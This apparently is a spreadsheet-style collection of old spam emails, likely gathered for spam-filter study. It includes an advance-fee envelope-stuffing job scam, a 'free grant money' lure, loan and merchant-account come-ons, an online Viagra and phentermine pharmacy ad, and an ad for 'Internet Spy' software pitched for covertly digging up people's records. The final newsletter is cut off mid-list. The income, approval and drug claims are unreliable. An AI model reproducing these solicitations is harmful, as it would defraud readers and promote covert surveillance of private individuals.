  Code # CY0795
**Processing fee must be in US FUNDS ONLY please.**
*If applicant is under 18 have a guardian sign above and indicate
age of applicant.
*If you don't have access to a printer, you may copy the application
onto regular notebook paper. Please use pen. (NOTE: Please be sure to
include the Code # on your application. Applications without a Code #
can not be processed.)
*All fees are one time fees. You will not be required, asked, or need
to pay us any other fees to stay with us and stay as long as you
like. All potential pay rates are Guaranteed!
*Please note that personal checks may be held up to 30 days for
bank clearance. If you are eager to get started, you should use a
Money Order for your processing fee.
Send Application and a $27.00 Check or Money Order (US FUNDS ONLY)
made payable to NetServ
Send to:NetServ
2135A des Laurentides Blvd
Suite 174
Laval, Quebec, Canada H7M 4M2
  Because we are a company recruiting people from the public we must
assure you that we are the BEST company to work with and that we provide
the MOST PROFITABLE income. Because we require an initial fee to get
started, many people are skeptical, and miss out on a great opportunity.
This fee covers our expenses for materials, postage, handling, and the time
it takes us to get you started. It also assures us that you are serious about
working with the Home-Mailers Program. We know that current Home-
Mailers are happy and making an excellent income just from reading their
testimonials. This makes us happy and enables us to succeed and continue
our success together. Here are just a couple of the many testimonials
received from Home-Mailers:
  I want to thank you for giving me this opportunity
  to work for your company. It couldn't have come along
  at a better time. The work is so simple and the pay is
  incredible. My wife and I have been stuffing envelopes
  together part-time and are exceeding what either of us
  make at our full-time jobs. Thanks again!
     J. Thomas ------ Miami, FL
  Thank you for everything! I was having trouble
  making ends meet at my present employment. But
  thanks to you and your Home-Mailers Program, I was
  able to pay off some old bills and put money in the
  bank. Now I'm looking forward to taking a well
  deserved vacation.
     M. Daniels ----- Seattle, WA
Why do we need Home-Mailers? The cost of supplying an office is more
expensive than most people may think. The cost of office space per square
foot, + taxes employing mailing staff, + taxes employing supervisors, +
taxes, medical insurance, dental insurance, and office liability insurance,
multiplied by each region we cover, all involving paperwork, accountants
and more taxes. WE NEED YOUR SERVICES TO SAVE TIME AND MONEY!
Your role in our company is as an Independent Commission Mailer, not an
employee. We will not take taxes from your paychecks and we cannot offer
medical or dental insurance. As a Home-Mailer, your residence and many
other aspects of everyday living may be able to be declared business
expenses. Receive cash-back on your taxes! You may request copies of
personal materials at any time at no charge to yourself. All business can 
be done by mail, from your own home. You can start the same day you
receive our materials and begin receiving money within days and have a
steady income as long as you desire. These positions require no prior
experience or special skills. There are many distribution companies who
want to expand their businesses, but do not want to pay the higher 
expenses. It is much easier to have independent Home-Mailers earn 
money doing this work themselves. This program is designed to help 
people cash in with a company who needs Home-Mailers. The Home-Mailers
Program has been perfected so that it has become one of the most 
successful and profitable programs ever and is supplying people around the
world with excellent primary and secondary incomes. We invite you to take
part in our success. The money you earn is up to you. We do not require 
that you mail a certain number of envelopes each week. You can take on
whatever amount of business that fits your schedule and you can stop
whenever you want, there are no obligations. There is no need to do any
door to door selling or phone soliciting. You may work in the comfort of your
own home, choose your own hours, set your own pace. No need to leave
your present job. Form workshops with your friends or get the whole family 
to join in. The possibilities are UNLIMITED!
  DUE TO COMPANY EXPANSION
  YOUR SERVICES ARE NEEDED NOW.
  Thank you, and we're looking forward to working
  with you, together in the future.
</t>
  </si>
  <si>
    <t xml:space="preserve">
This is a MIME Message------=_NextPart_000_007F_01BDF6C7.FABAC1B0
Content-Type: multipart/alternative; boundary="----=_NextPart_001_0080_01BDF6C7.FABAC1B0"------=_NextPart_001_0080_01BDF6C7.FABAC1B0
Content-Type: text/plain; charset="iso-8859-1"
Content-Transfer-Encoding: quoted-printable***** This is an HTML Message ! *****
------=_NextPart_001_0080_01BDF6C7.FABAC1B0
Content-Type: text/html; charset="iso-8859-1"
Content-Transfer-Encoding: quoted-printable
FREE Computer With Merchant Account SetupCOMPLETE CREDIT CARD PROCESSING SYSTEMS FOR YOUR BUSINESS=2E INTERNE=
T -  HOME
BASED -  MAIL ORDER -  PHONE ORDER
Do you accept credit cards? Your competition does!
Â 
Everyone Approved - Credit Problems OK!
Approval in less than 24 hours!
Increase your sales by 300%
Start Accepting Credit Cards on your website!
Free Information, No Risk, 100% confidential=2E
Your name and information will not be sold to thrid parties!
Home Businesses OK!  Phone/Mail Order OK!
No Application Fee, No Setup Fee!
Close More Impulse Sales!
Everyone Approved!
 Good Credit or Bad!Â  To=
 apply today, please fill out
        the express form below=2E It
contains all the information we need to get your account approved=2E For a=
rea's
that do not apply to you please put "n/a" in the box=2EUpon receipt, we'll fax you with all of the all Bank Card Application
documents necessary to establish your Merchant Account=2E Once returned we=
 can
have your account approved within 24 hours=2EÂ 
Service
Industry
        StandardUSSite
        Inspection
$50 - $75
FREE
Shipping
$50 - $75
FREE
Warranty
$10 Per Month=FREE
Sales
        Receipts
$10 - $50&amp;nbs=
p;
FREE
Fraud
        Screening
$=2E50 - $1=2E00
Per Transaction
FREE
Amex Set
        Up
$50 - $75
FREE
24 HourÂ Help
        Line
$10 Month
FREE
Security
        Bond
$5000- $10,00=
0
Or More
NONEThis is a No
        Obligation Qualification Form and is your first step to
        accepting credit cards=2E By filling out this form you will=
 "not
        enter" in to any obligations o=
r
        contracts with us=2E We will use it to determine the best p=
rogram
        to offer you based on the information you provide=2E You will be c=
ontacted by one of our representatives within 1-2 business days to go over =
the rest of your account set up=2E
&lt;=
font color=3D"#cc0000"&gt;Note:Â 
        All Information Provided To Us Will Remain=
 100%
        Confidential
        !!Â Apply
        Free With No Risk!
Pleas=
e fill out the
        express application form completely=2EIncomplete information m=
ay prevent us from properly
        processing your application=2E
Your Full Emai=
l Address:
be sure to use your full address (i=
=2Ee=2E
user@domain=2Ecom)Your Name:Business Name:=
Business Phone=
 Number:Home Phone Num=
ber:Type of Busine=
ss:Retail BusinessMail Order BusinessInternet Based Busines=
s
Personal Credi=
t Rating:ExcellentGoodFairPoor
How Soon Would=
 You Like a Merchant
        Account?
Your info=
rmation is confidential, it will not be sold or used for any other purpose,=
 and you are under no obligation=2E
        Your information will be used solely for the purpose of evaluating=
 your business or website for a merchant account so that you may begin acce=
pting credit card payments=2EList
 Removal/OPT-OUT Option
Click
 Herem------=_NextPart_001_0080_01BDF6C7.FABAC1B0--------=_NextPart_000_007F_01BDF6C7.FABAC1B0--</t>
  </si>
  <si>
    <t xml:space="preserve">
Qualifying for a free cash grant is easy!
$10,000 to over $500,000 in FREE Grant Money is Available NOW!~ Never Repay ~
~ No Credit Checks ~
~ No Interest Charges ~See if YOU meet the requirements!Visit our website at:http://1071396130/index2.htmThis mailing is done by an independent marketing company.
We apologize if this message has reached you in error.
Save the Planet, Save the Trees! Advertise via E mail.
No wasted paper! Delete with one simple keystroke!
Less refuse in our Dumps! This is the new way of
the new millennium!To be removed from hearing about all future
products and services please send
a separate email to: zapme013@aol.com 
</t>
  </si>
  <si>
    <t xml:space="preserve">More Than $2500 in DEBT?We Can Help You PAY-OFF Your BILLS!!
Click here for your FREE Consultation!!
http://www.cash-refund.com/~Cut your monthly payments by 50% or even more...
~Stop paying Creditors high interest rates?
~Better Manage your Financial Situation...Keep More Cash every Month!
~We can Help STOP any Creditor Harassment!
~Consolidate Regardless of past Credit History!Quick - Confidential - No Obligations -
Click on the link below to get started!!
http://www.cash-refund.com/~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~If this message has reached you in error and you wish to be removed from our
mailing list please click this link:
mailto:debtgone@btamail.net.cn?subject=Remove
</t>
  </si>
  <si>
    <t xml:space="preserve">C:\Mortgage\html1.htmA:hover {
	COLOR: #ff0000
}
If you would like to be removed
from future mailings, please reply with the word remove in the subject or call
888-418-2575.Let lenders
compete for
your business!Click HereCash
back refinances
No Equity 2nd Trust Deeds
Debt Consolidation
No Income Verification
The most competitive interest rates!Fill in our quick pre-qualification form and you 
will get competing loan offers,
oftenÂ 
within minutes from up to three lenders!Click HereThere is NEVER any fee to consumers for using this service.
Copyright ï¿½FFFFA9 1999, 2000 eWorld Marketing,
Inc.
888-418-2575
This is not a solicitation or offer to lend money.Â  
eWorld Marketing is not a lender, broker or 
other financial intermediary.Â  We are a marketing company 
that provides services to the mortgage industry. 
</t>
  </si>
  <si>
    <t xml:space="preserve">
Â VIAGRA
TM
                  Â 
Is the breakthrough
      medication that has restored
      or enhanced the Sex lives of millions of men.
Is available to you online
      and
FedExtm
      delivered to your mailbox at
      LOWEST PRICES
 ANYWHEREPlus we offer
P H E N T E R M I N E
The World Renown Weight
      Loss Miracle Pill.
Online Ordering is
      Convenient, Affordable and Confidential.
Â  For More
      Savings
      Info.
Please
      Become One Of Our Many
      Â We are your online pharmacy for
       FDA approved drugs
      Â through FREE online consultation. We offer the widestÂ 
 range of drugs available through online ordering.Â 
      We
      have the Lowest Priced Viagra On The Internet.Â       Â  For The
      Perfect Experience
      Click Here and Revitalize Your Life.
Â 
      To be removedÂ put your email address in the body of the email along with
      Â the words "user inactiv*e" without the * by just clicking Remove Me ******</t>
  </si>
  <si>
    <t xml:space="preserve">
Dear Friend:Find solutions to all your daily problems and life's challenges at the click of a mouse button?We have the answers you're looking for on The Word Bible CD-ROM it is one of the most powerful, life-changing tools available today and it's easy to use.On one CD, (Windows or Macintosh versions) you have a complete library of Bibles, well known reference books and study tools. You can view several Bible versions simultaneously, make personal notes, print scriptures and search by word, phrase or topic.The Word Bible CD offers are simply amazing.The wide range of resources on the CD are valued at over $1,500 if purchased separately.**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IndexAlso:** Build a strong foundation for dynamic Bible Study,
** Make personal notes directly into your computer,
** Create links to favorite scriptures and books.Try it. No Risk. 30-day money-back guarantee
[excluding shipping &amp; handling]If you are interested in complete information on The Word CD, please visit our
Web site: http://bible.8mail.net/
US and International orders accepted. Credit cards and personal checks accepted.If your browser won't load the Web site please click the link below to send us an e-mail and we will provide you more information.mailto:cd-bible@minister.com?subject=Please-email-Bible-info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face.May God Bless You,
GGII Ministries, 160 White Pines Dr., Alpharetta Ga, 30004
E-mail address:CD-bible@minister.com  
Phone:  770-343-9724  Fax 770-772-9925******************************************We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mailto:rm8952@post.com?subject=offlist     </t>
  </si>
  <si>
    <t xml:space="preserve">
READY TO KNOW?
&gt; 
&gt; CONFIDENTIAL
&gt; 
&gt; The SOFTWARE They Want BANNED In all 50 STATES.
&gt; Why? Because these secrets were never intended to reach your eyes...
&gt; Get the facts on anyone!    
&gt; 
&gt; Locate Missing Persons, find Lost Relatives, obtain Addresses
&gt; and Phone Numbers of old school friends, even Skip Trace Dead 
&gt; Beat Spouses. This is not a Private Investigator, but all
&gt; sophisticated SOFTWARE program DESIGNED to automatically
&gt; CRACK YOUR CASE with links to thousands of Public Record databases. 
&gt; 
&gt; Find out SECRETS about your relatives, friends, enemies,
&gt; and everyone else! -- even your spouse! With the New,
&gt;              INTERNET SPY AND YOU!
&gt; 
&gt; It's absolutely astounding! Here's what you can learn:
&gt; 
&gt; License plate number!
&gt;  Get anyone's name and address with just a license plate number!
&gt;  (Find that girl you met in traffic!)
&gt; 
&gt; Driving record! 
&gt;  Get anyone's driving record
&gt; 
&gt; Social security number!
&gt;   Trace anyone by social security number!
&gt; 
&gt; Address! 
&gt;  Get anyone's address with just a name!
&gt; 
&gt; Unlisted phone numbers! 
&gt;  Get anyone's phone number with just a name-even unlisted numbers!
&gt; 
&gt; Locate! 
&gt;  Long lost friends, relatives, a past lover who broke your heart!
&gt; 
&gt; E-mail! 
&gt; Send anonymous e-mail completely untraceable!
&gt; 
&gt; Dirty secrets!
&gt;   Discover dirty secrets your in-laws don't want you to know!
&gt; 
&gt; Investigate anyone! 
&gt;  Use the sources that private investigators use (all on the Internet)
&gt;  secretly!
&gt; 
&gt; Ex-spouse!
&gt;   Learn how to get information on an ex-spouse that will help you 
&gt;   win in court!  (Dig up old skeletons)
&gt; 
&gt; Criminal search-Backround check!
&gt;   Find out about your daughters boyfriend! 
&gt;   (or her husband)
&gt; 
&gt; Find out! 
&gt;  If you are being investigated!
&gt; 
&gt; Neighbors!
&gt;   Learn all about your mysterious neighbors! Find out what they 
&gt;   have to hide!
&gt; 
&gt; People you work with!
&gt;   Be astonished by what you'll learn about people you work with!
&gt;
&gt; Education verification!
&gt;   Did he really graduate college?  Find out!
&gt; 
&gt; Internet Spy and You
&gt;  Software will help you discover ANYTHING about anyone, with 
&gt;  clickable hyperlinks and no typing in Internet addresses! Just
&gt;  insert the floppy disk and Go!
&gt; 
&gt; You will be shocked and amazed by the secrets that can be
&gt;  discovered about absolutely everyone! Find out the secrets 
&gt;  they don't want you to know! About others, about yourself! 
&gt; 
&gt; It's INCREDIBLE what you can find out using Internet Spy and You
&gt;  and the Internet! You'll be riveted to your computer screen!
&gt;  Get the software they're trying to ban! Before it's too late!
&gt; 
&gt; LIMITED TIME SPECIAL PRICE...ORDER TODAY!
&gt; 
&gt; Only $16.95 
&gt; 
&gt; 
&gt; We will RUSH YOU our Internet Spy and You software so you can
&gt;  begin discovering all the secrets you ever wanted to know!
&gt; 
&gt; You can know EVERYTHING about ANYONE with our Internet Spy and
&gt; You Software. Works with all browsers and all versions of AOL!
&gt; 
&gt; ORDER TODAY: SEND ONLY $16.95 US CASH, CHECK, OR MONEY ORDER
&gt; (you may also send one of your own address labels
&gt; for accuracy if you have one.)
&gt; 
&gt; ATTENTION ORDERS OUTSIDE THE US:  You must ad $5 for shipping.
&gt; 
&gt; 
&gt; *Foreign money orders must be payable on a US BANK AND IN US FUNDS!
&gt; NO EXCEPTIONS!
&gt; 
&gt;
&gt; 
&gt; 
&gt; DON'T WAIT TO GET STARTED... it's as easy as 1. 2. 3.
&gt; 
&gt; 
&gt; STEP 1 - Print the order form text below
&gt; 
&gt; STEP 2 - Type or print your order information into the order form section
&gt; 
&gt; STEP 3 - Mail order form and payment to the address below
&gt; 
&gt; 
&gt;           
&gt; 
&gt; &gt;&gt;&gt;&gt;&gt;&gt;&gt;&gt;&gt;&gt;&gt;&gt;&gt;&gt;&gt;&gt;&gt;&gt;&gt;&gt;&gt;&gt;&gt;&gt;&gt;&gt;Mail the portion below&lt;&lt;&lt;&lt;&lt;&lt;&lt;&lt;&lt;&lt;&lt;&lt;&lt;&lt;&lt;&lt;&lt;&lt;&lt;&lt;
&gt; 
&gt;     Send to:
&gt; 
&gt;    Web Systems
&gt;    
&gt;    PO BOX 1613
&gt; 
&gt;    Council Bluffs, IA 51502
&gt; 
&gt;    
&gt;     U.S.A
&gt;
&gt;     
&gt; 
&gt;
&gt; 
&gt; &gt;&gt;&gt;&gt;&gt;&gt;&gt;&gt;&gt;&gt;&gt;&gt;&gt;&gt;&gt;&gt;&gt;&gt;&gt;&gt;&gt; Mail-in Order Form &lt;&lt;&lt;&lt;&lt;&lt;&lt;&lt;&lt;&lt;&lt;&lt;&lt;&lt;&lt;&lt;&lt;&lt;&lt;&lt;&lt;&lt;&lt;&lt;
&gt; 
&gt; 
&gt; 
&gt;
&gt; Name: ______________________________&gt; 
&gt; Address:  _____________________________
&gt; 
&gt;
&gt; City/State/Zip __________________________________________
&gt; 
&gt; &gt;
&gt; 
&gt;
&gt; 
&gt; &gt; 
&gt; &gt;&gt;&gt;&gt;&gt;&gt;&gt;&gt;&gt;&gt;&gt;&gt;&gt;&gt;&gt;&gt;&gt;&gt;&gt;&gt;&gt;&gt; end of form &lt;&lt;&lt;&lt;&lt;&lt;&lt;&lt;&lt;&lt;&lt;&lt;&lt;&lt;&lt;&lt;&lt;&lt;&lt;&lt;&lt;&lt;&lt;&lt;&lt;&lt;&lt;&lt;&lt;&lt;
&gt; 
&gt; DISCLAIMER: The seller of this powerful software resource will not be 
&gt; held responsible for how the purchaser chooses to use its resources.
&gt; 
&gt;
&gt;
&gt; 
&gt; To be removed from our mailing list please
&gt; send an email to exit1418@yahoo.com and put remove
&gt; in the subject.
&gt; Thank you</t>
  </si>
  <si>
    <t xml:space="preserve">
---1347074105.994417746234.JavaMail.RovAdmin.rovweb002
Content-Type: text/plain; charset=iso-8859-1Your Membership Community &amp; Commentary (July 6, 2001)
It's All About Making MoneyInformation to provide you with the absolute 
best low and no cost ways of providing traffic 
to your site, helping you to capitalize on the power and potential the web brings to every Net-Preneur. 
--- This Issue Contains Sites Who Will Trade Links With You! --- -------------
IN THIS ISSUE
-------------
Internet Success Through Simplicity
Member ShowcaseWin A FREE Ad In Community &amp; Commentary||| =-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=&gt;&gt;
    Today's Special Announcement:
||| =-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=&gt;&gt;We can help you become an Internet Service provider within 7 days or we will give you $100.00!!
Click Here
We have already signed 300 ISPs on a 4 year contract, 
see if any are in YOUR town at:
Click Here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
Internet Success Through Simplicity
=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=Every day of the week, I get questions from people all  
 over the world, including my No BS GIMG Members,  
 wanting to know some of the most valuable "secrets" 
 to my on-going internet success.
Let me say, above all else, I don't believe there are any 
 *true* "secrets" to success on the Net. What you do to 
 become successful in the online world is not a "secret", 
 in my opinion. Most successful people follow simple, clear, 
 repeatedly-proven strategies to succeed, whether on the 
 Net or off.
But, when it comes to someone asking for advice, 
 consultation, or simply asking, "What's your secret?", 
 I have to blush &amp; say ...
Persistence and personality.
Of course, I always follow the advice with my own little 
 disclaimer: What makes ME successful may not work the 
 same for YOU ... &amp; your first lesson is to get over 
 the deep-seeded idea that success - of any kind, in  
 my opinion - is somehow an unknown, unattainable secret.
Clearly, it is not. It's not unknown. It's not unattainable. 
 It's not years of digging to find the "secrets" to internet riches.
One thing that "gets to me" so often in my work as an 
 Internet Consultant, author and Internet Success 
 Strategist is that so many people on the Net seem to 
 have this incredibly huge mental block that stands 
 between themselves and success on the Net. It's 
 almost as if they've been barraged by so many claims 
 of what works and what doesn't work, and so many 
 LONG, complicated routes to actually succeeding in 
 their online venture, that "success" is the  equivelant of a 100-foot high brick wall.
It's NOT that difficult, my friends! It is NOT that complicated!!
Long-time friend and business associate Rick Beneteau 
 has a new eBook out called Branding YOU &amp; Breaking 
the Bank. Get it!! 
 http://www.roibot.com/bybb.cgi?IM7517_bybtb . 
 But, the reason I mention this is the fact that he talks 
 so dynamically about the true simplicity of making your 
 online venture a success. 
And, yes, Rick &amp; I come from the same school of 
 "self marketing" - marketing YOU! Obviously, that's 
 the core of his excellent new ebook, and I couldn't 
 agree with him more.
Point being, *you* ARE everything you do online to 
 succeed. You ARE your web site, your business, your 
 marketing piece, your customer service, your customers' 
 experiences with your business -- ALL of it, is YOU! 
 Read his ebook &amp; you'll see more of what I'm saying.
The matter at hand is that brick wall you might have 
 standing high as you can see, blocking the path 
 between you &amp; internet success. Listen to me - it is 
 not real OK? It doesn't exist. There's nothing there 
 to fear to begin with ... get over it!!
What I'm telling you is, the only thing standing between 
 you and the success you most desire ... is yourself. 
 When you realize this, you will tear down that brick 
 wall by means of complete and instantaneous 
 disintegration. It will no longer exist *in your mind*, 
 which is the only "real" place it ever was anyhow!
Yes, "persistence and personality" inherently includes 
 honesty, integrity, accountability, and many other 
 qualities but you also have to hone in on your ultimate 
 goals and realize that probably the most valuable,  
 powerful key to your success ... is YOU!
That may be the most incredible "secret" we ever 
 uncover in our lifetime! And, trust me, that brick wall 
 won't ever get in your way again ... unless you let it.
Talk about SIMPLE!!
------------------------------------------------------
 Bryan is a "veteran"  Internet  Consultant, Author, 
 Internet Success Strategist &amp; Marketer. He publishes 
 Mega-Success.com Chronicles to over 11,500  subscribing 
 members, authors articles which appear all over the 
 Net, and helps hundreds of wealth-hungry people in 
 their journey to Internet success. 
Bryan is also Director of his No BS Guerrilla Internet 
 Marketing Group at http://NoBSGuerrillaInternetMarketing.com
&amp; a fantastic new Joint Venture Partners program 
  for that site.
Bryan Hall is a Founding Member and the Development 
 Consultant for the prestigious iCop(TM) at 
 http://www.i-cop.org/1016.htm
You  can  reach  Bryan  at  877.230.3267  or  by
 emailing  him directly at bryan.hall@mega-success.com
=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=
Member Showcase
=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=Examine carefully - Those with email addresses included WILL
TRADE LINKS with you... You are encouraged to contact them.
There Are Many Ways To Build A Successful Business - Just look at
these successful sites &amp; programs other members are involved
in...
-------------------------------------------------
Get INSANE amounts of traffic to your website.
Purchase 10,000 Guaranteed Visitors to your site
and receive 5,000 free. MORE TRAFFIC = MORE MONEY!
Less than 2cents a visitor.Â  Space is limited.
Order Now! http://www.freepicklotto.comÂ 
Trade Links - businessopps@aol.com
-------------------------------------------------
Stop Smoking - Free Lesson !!
Discover the Secret to Stopping Smoking.
To Master these Powerful Techniques, Come to
http://www.breath-of-life.net
for your Free Lesson.
Act Now!Â  P.S. Tell someone you care about.
Trade Links - jturco3@hotmail.com
-------------------------------------------------
Celebration Sale!
$99.00 on Casinos/Sportsbetting sites, Lingerie stores,
Gift Stores, Adult Sites &amp; Toy Stores.
Mention Ad#BMLM99 to receive this special sale price.
Order Now!
http://www.cyberopps.com/?=BMLM99
-------------------------------------------------
Affiliates of the World!
Top rated affiliate programs, excellent business opportunities,
great marketing resources and free advertising for you!
Visit the site to trade links. http://www.affiliates.uk.com
Trade Links - adrianbold@affiliates.uk.com
-------------------------------------------------
JUST BEEN RELEASED!!
Internet Marketing guru Corey Rudl has just released a
BRAND NEW VERSION of his #1 best-selling Internet Marketing
Course,"The Insider Secret's to Marketing Your Business on
the Internet". A MUST HAVE! So don't hesitate,
visit.. http://www.adminder.com/c.cgi?start&amp;bgmlmezine
-------------------------------------------------
We have a 260 page catalog with over 3000 gift items for men,
women, children - A gift for everyone. We show 100 gift items
on our web site alone, with the catalogÂ  you have access to
the rest. We also feel we have the best prices on the web.
Visit at http://www.treasuresoftomorrow.net
Trade Links - george1932me@yahoo.com
-------------------------------------------------
If you have a product, service, opportunity or quality merchandise
that appeals to people worldwide, reach your targeted audience!
For a fraction of what other large newsletters charge you can exhibit
your website here, and trade links for only $8 CPM.Â  Compare
that
to the industry average of $10-$15 CPM. Why?... Because as a
valuable member we want you to be successful! Order today -
Showcases are limited and published on a first come, first serve
basis.
For our secure order form, click here: http://bannersgomlm.com/ezine=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-==-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=
=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=
Win A FREE Ad In Community &amp; Commentary
=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=To keep this interesting, how about this, every month we'll
draw a name from the replies and that person will win one
Sponsorship Showcase ad in the Community &amp; Commentary, for FREE.
That's a value of over $700.00! Respond to each weekly survey,
and increase your chances to win with four separate entries.
Â Â Â Â Â Â Â Â Â Â  QUESTION
OF THE WEEK (07/06/01)...
Â Â Â Â  No right or wrong answers, and just by answering
Â Â Â Â  you are entered to win a Showcase ad - Free!
Â Â Â Â  ~~~ Do you spend more or less time ~~~
Â Â Â Â Â  ~~~ online in the summer months? ~~~
Â Â Â Â  MoreÂ Â Â Â Â Â Â 
mailto:one@AEOpublishing.com
Â Â Â Â  LessÂ Â Â Â Â Â Â 
mailto:two@AEOpublishing.com
Â Â Â Â  SameÂ Â Â Â Â Â Â Â 
mailto:three@AEOpublishing.com
To make this as easy as possible for you, just click on the
e-mail address that matches your answer - you do not need to
enter any information in the subject or body of the message.
** ADD YOUR COMMENTS!Â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question.Â  Multiple responses
from the same individual will be discarded.Last Weeks's Results (06/29/01)
Â Â Â Â  ~~~ What is the goal of your website? ~~~
Â Â Â Â  SellÂ Â Â Â Â Â Â Â 40%
Â Â Â Â  Get LeadsÂ Â Â Â Â Â Â Â 20%
Â Â Â Â  Build BrandingÂ Â Â Â Â Â 5%
Â Â Â Â  Provide InformationÂ  20%
Â Â Â Â  OtherÂ Â Â Â Â Â Â Â  15%Comments:
----------------------------
Our web site is initially designed to get leads, build 
branding, and provide information.......with a 12 month goal 
of selling our service more specifically via a shopping cart. 
We offer a service and at this time take deposits and payments 
via our site.
Our site has been up less than 2 months and our expectation 
was that we would refer to our site for leads developed in 
traditional media and by referral for more information, and 
to make a professional impression on someone you may not 
meet before providing service.
The growth of our customer base shopping on line has grown 
outside of anyone's expectations.......certainly mine and 
I've been in this business for 25 years. The Internet is not 
dead in the horse business, it is just getting it's legs, and 
the folks using it want to get all the ancillary services 
on-line as well. Our site (the first we've developed) has 
exceeded our expectations, and we aren't satisfied with it 
yet.......we just wanted to get it there for information!
 Jeff and Rebecca Marks http://www.grand-champion.com
-------------------------------------------------
Branding. While quality customer service and product 
have been and will always be our top priority brand building 
Zesto is our most challenging task.
Zesto.com ranks very high and most often #1 or 2 on 
all major search engines and directories even Yahoo entering 
the keyword zesto. The problem is simply that,who if anyone 
would type the keyword zesto, therefore we must try to 
build our brand by ensuring that generic keywords associated with our products (citrus peel) are used throughout 
our site as well as search engine submissions.
Fortunately owning a non generic domain short, easy 
to remember and trademarked works in our favor because 
the marketability potential is limitless.
Arlene Turner  http://www.zesto.com
=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-==-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=To change your subscribed address,
send both new and old address to Submit
See below for unsubscribe instructions.Please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email:  YourMembership2@AEOpublishing.com
voice:  
web: http://www.AEOpublishing.com
------------------------------------------------This email has been sent to jm@netnoteinc.com at your 
request, by Your Membership Newsletter Services.Visit our Subscription Center to edit your interests or unsubscribe.
http://ccprod.roving.com/roving/d.jsp?p=oo&amp;id=bd7n7877.7giv5d57&amp;m=bd7n7877&amp;ea=jm@netnoteinc.comView our privacy policy: http://ccprod.roving.com/roving/CCPrivacyPolicy.jspPowered by 
Constant Contact(R)
www.constantcontact.com
---1347074105.994417746234.JavaMail.RovAdmin.rovweb002
Content-Type: text/html; charset=iso-8859-1
Your Membership Community &amp; Commentary, 07-06-01Your Membership Community &amp; Commentary
Â Â It's All About Making Money
July 6, 2001Â Â in this issue
Internet Success Through Simplicity
Member ShowcaseWin A FREE Ad In Community &amp; CommentaryToday's Special Announcement:
We can help you become an Internet Service provider within 7 days or we will give you $100.00!!
Click Here
We have already signed 300 ISPs on a 4 year contract, 
see if any are in YOUR town at:
Click Here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Â Â Information to provide you with the absolute 
best low and no cost ways of providing traffic 
to your site, helping you to capitalize on the power and potential the web brings to every Net-Preneur. 
--- This Issue Contains Sites Who Will Trade Links With You! --- 
 Internet Success Through SimplicityÂ Â Every day of the week, I get questions from people all  
 over the world, including my No BS GIMG Members,  
 wanting to know some of the most valuable "secrets" 
 to my on-going internet success.
Let me say, above all else, I don't believe there are any 
 *true* "secrets" to success on the Net. What you do to 
 become successful in the online world is not a "secret", 
 in my opinion. Most successful people follow simple, clear, 
 repeatedly-proven strategies to succeed, whether on the 
 Net or off.
But, when it comes to someone asking for advice, 
 consultation, or simply asking, "What's your secret?", 
 I have to blush &amp; say ...
Persistence and personality.
Of course, I always follow the advice with my own little 
 disclaimer: What makes ME successful may not work the 
 same for YOU ... &amp; your first lesson is to get over 
 the deep-seeded idea that success - of any kind, in  
 my opinion - is somehow an unknown, unattainable secret.
Clearly, it is not. It's not unknown. It's not unattainable. 
 It's not years of digging to find the "secrets" to internet riches.
One thing that "gets to me" so often in my work as an 
 Internet Consultant, author and Internet Success 
 Strategist is that so many people on the Net seem to 
 have this incredibly huge mental block that stands 
 between themselves and success on the Net. It's 
 almost as if they've been barraged by so many claims 
 of what works and what doesn't work, and so many 
 LONG, complicated routes to actually succeeding in 
 their online venture, that "success" is the  equivelant of a 100-foot high brick wall.
It's NOT that difficult, my friends! It is NOT that complicated!!
Long-time friend and business associate Rick Beneteau 
 has a new eBook out called Branding YOU &amp; Breaking 
the Bank. Get it!! 
 http://www.roibot.com/bybb.cgi?IM7517_bybtb . 
 But, the reason I mention this is the fact that he talks 
 so dynamically about the true simplicity of making your 
 online venture a success. 
And, yes, Rick &amp; I come from the same school of 
 "self marketing" - marketing YOU! Obviously, that's 
 the core of his excellent new ebook, and I couldn't 
 agree with him more.
Point being, *you* ARE everything you do online to 
 succeed. You ARE your web site, your business, your 
 marketing piece, your customer service, your customers' 
 experiences with your business -- ALL of it, is YOU! 
 Read his ebook &amp; you'll see more of what I'm saying.
The matter at hand is that brick wall you might have 
 standing high as you can see, blocking the path 
 between you &amp; internet success. Listen to me - it is 
 not real OK? It doesn't exist. There's nothing there 
 to fear to begin with ... get over it!!
What I'm telling you is, the only thing standing between 
 you and the success you most desire ... is yourself. 
 When you realize this, you will tear down that brick 
 wall by means of complete and instantaneous 
 disintegration. It will no longer exist *in your mind*, 
 which is the only "real" place it ever was anyhow!
Yes, "persistence and personality" inherently includes 
 honesty, integrity, accountability, and many other 
 qualities but you also have to hone in on your ultimate 
 goals and realize that probably the most valuable,  
 powerful key to your success ... is YOU!
That may be the most incredible "secret" we ever 
 uncover in our lifetime! And, trust me, that brick wall 
 won't ever get in your way again ... unless you let it.
Talk about SIMPLE!!
------------------------------------------------------
 Bryan is a "veteran"  Internet  Consultant, Author, 
 Internet Success Strategist &amp; Marketer. He publishes 
 Mega-Success.com Chronicles to over 11,500  subscribing 
 members, authors articles which appear all over the 
 Net, and helps hundreds of wealth-hungry people in 
 their journey to Internet success. 
Bryan is also Director of his No BS Guerrilla Internet 
 Marketing Group at http://NoBSGuerrillaInternetMarketing.com
&amp; a fantastic new Joint Venture Partners program 
  for that site.
Bryan Hall is a Founding Member and the Development 
 Consultant for the prestigious iCop(TM) at 
 http://www.i-cop.org/1016.htm
You  can  reach  Bryan  at  877.230.3267  or  by
 emailing  him directly at bryan.hall@mega-success.com 
Member ShowcaseÂ Â Examine carefully - Those with email addresses included WILL
TRADE LINKS with you... You are encouraged to contact them.
There Are Many Ways To Build A Successful Business - Just look at
these successful sites &amp; programs other members are involved
in...
-------------------------------------------------
Get INSANE amounts of traffic to your website.
Purchase 10,000 Guaranteed Visitors to your site
and receive 5,000 free. MORE TRAFFIC = MORE MONEY!
